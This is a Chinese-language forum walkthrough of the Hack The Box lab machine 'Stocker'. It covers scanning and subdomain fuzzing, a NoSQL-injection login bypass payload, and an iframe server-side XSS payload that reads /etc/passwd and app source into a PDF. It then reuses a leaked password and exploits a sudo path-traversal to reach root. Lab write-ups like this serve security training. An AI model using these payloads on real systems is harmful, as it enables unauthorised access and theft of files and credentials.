首页
社区
课程
招聘
[原创]HTB Stocker (easy)
发表于: 2023-1-26 14:01 1499

[原创]HTB Stocker (easy)

2023-1-26 14:01
1499

上来还是信息收集,扫端口扫域名,扫目录

图片描述
第一次 扫描发现状态码 301的很多,过滤下
这里的 过滤不是太会用 ,好像老版本的ffuf有过滤参数,有大佬会教下

图片描述
dirsearch -u http://stocker.htb/
图片描述
再扫一下dev下的
dirsearch -u http://dev.stocker.htb/
图片描述
访问http://dev.stocker.htb/login登陆页面
我们需要身份认证绕过,在这个网址里可以看到相关知识
https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass
图片描述

完成登陆绕过,到 /stock页面
图片描述
网站是个购物网站,将物品添加到购物车然后结账
图片描述
图片描述
点击结算页面的here后获得到一个pdf形式的账单
图片描述
图片描述
“title”反馈在pdf中,“orderId”反馈到url
尝试在title处尝试xss
"title":"<iframe src=file:///etc/passwd></iframe>"
相关知识:https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf
图片描述
修改下宽高

图片描述
找到一个angoose用户
图片描述
使用插件可以 看出网站使用的node.js
尝试读下js文件
"<iframe src=file:///var/www/dev/index.js height=750px width=750px></iframe>"
图片描述
获得密码IHeardPassphrasesArePrettySecure
尝试登录angoose:IHeardPassphasesArePrettySecure
图片描述
sudo -l发现 指定目录下的js文件都能以root权限运行
图片描述

写一个shell使用目录遍历执行它

图片描述

sudo  nmap -sS -sV -sC  10.10.11.196
sudo  nmap -sS -sV -sC  10.10.11.196
ffuf -w wordlist/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u http://stocker.htb -H "Host:FUZZ.stocker.htb" -fs  169 -mc 200,204,302,307,401,403,404,405,500
ffuf -w wordlist/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u http://stocker.htb -H "Host:FUZZ.stocker.htb" -fs  169 -mc 200,204,302,307,401,403,404,405,500
Content-Type: application/json
{"username": {"$ne": null}, "password": {"$ne": null} }
Content-Type: application/json
{"username": {"$ne": null}, "password": {"$ne": null} }

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//